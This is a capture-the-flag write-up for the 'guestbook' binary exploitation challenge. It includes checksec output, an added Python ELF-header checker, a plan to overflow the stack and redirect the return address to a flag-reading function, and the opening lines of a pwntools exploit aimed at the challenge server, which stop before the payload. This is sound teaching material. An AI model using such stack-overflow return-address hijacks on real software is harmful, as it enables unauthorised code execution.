```
$ checksec --file guestbook
[*] '/Users/miao//CTF/PWN/guestbook/guestbook'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```
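Added example (not part of the original writeup): how the RELRO / NX / PIE rows of that checksec output are derived from the ELF64 headers, using only the Python standard library. The `Stack` (canary) row needs the symbol table and is left out; `build_sample_elf` constructs header-only test images, not loadable binaries.

```python
"""Mini checksec: derive the RELRO / NX / PIE rows from ELF64 headers (stdlib only)."""
import struct

ET_DYN = 3                                   # e_type of a PIE (shared object)
PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474e551, 0x6474e552
PF_X = 1                                     # executable segment flag
DT_NULL, DT_BIND_NOW, DT_FLAGS, DF_BIND_NOW = 0, 24, 30, 0x8

def checksec(data: bytes) -> dict:
    """Return the PIE / NX / RELRO verdicts the way checksec prints them."""
    assert data[:5] == b"\x7fELF\x02", "ELF64 only"
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    nx = relro = bind_now = False              # no PT_GNU_STACK at all means an executable stack
    for i in range(e_phnum):
        p_type, p_flags, p_off, _, _, p_filesz = struct.unpack_from(
            "<IIQQQQ", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
        elif p_type == PT_DYNAMIC:             # Full RELRO also needs BIND_NOW in .dynamic
            for j in range(0, p_filesz, 16):
                tag, val = struct.unpack_from("<qQ", data, p_off + j)
                if tag == DT_NULL:
                    break
                if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW):
                    bind_now = True
    relro_row = "Full RELRO" if relro and bind_now else "Partial RELRO" if relro else "No RELRO"
    return {"PIE": e_type == ET_DYN, "NX": nx, "RELRO": relro_row}

def build_sample_elf(pie: bool, nx: bool, relro: str) -> bytes:
    """Constructed test input: only the headers checksec inspects, not a loadable binary."""
    phdrs = [[PT_GNU_STACK, 6 if nx else 7, 0, 0, 0, 0, 0, 16]]
    dyn = b""
    if relro != "No RELRO":
        phdrs.append([PT_GNU_RELRO, 4, 0, 0, 0, 0, 0, 1])
        flags = DF_BIND_NOW if relro == "Full RELRO" else 0
        dyn = struct.pack("<qQqQ", DT_FLAGS, flags, DT_NULL, 0)   # .dynamic placed after the phdrs
        phdrs.append([PT_DYNAMIC, 6, 64 + 56 * (len(phdrs) + 1), 0, 0, len(dyn), len(dyn), 8])
    ehdr = bytearray(64)
    ehdr[:7] = b"\x7fELF\x02\x01\x01"           # magic, ELFCLASS64, little-endian, version 1
    struct.pack_into("<HHIQQQIHHHHHH", ehdr, 16, ET_DYN if pie else 2, 0x3e, 1,
                     0x400000, 64, 0, 0, 64, 56, len(phdrs), 0, 0, 0)
    return bytes(ehdr) + b"".join(struct.pack("<IIQQQQQQ", *p) for p in phdrs) + dyn
```

Running `checksec(open('guestbook', 'rb').read())` on the real binary reproduces the three rows above (No PIE, NX enabled, No RELRO).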
Static analysis
Open the binary in IDA and press F5: there is an obvious stack overflow, and the binary also contains a good_game function.
The good_game function reads the flag.
So the plan is clear: use the overflow to overwrite the return address with the address of good_game, which then reads the flag.
exploit
Confirm the details and the address of good_game in gdb.
Build the exploit:
```python
from pwn import *

elf = ELF('./guestbook')
sh = remote('pwn.jarvisoj.com', 9876)
# sh = process('./guestbook')  # run against a local copy instead
context.arch = 'amd64'
context.log_level = 'debug'

# No PIE, so the address of good_game is fixed and can be taken from the symbol table
good_game_addr = elf.symbols["good_game"]
```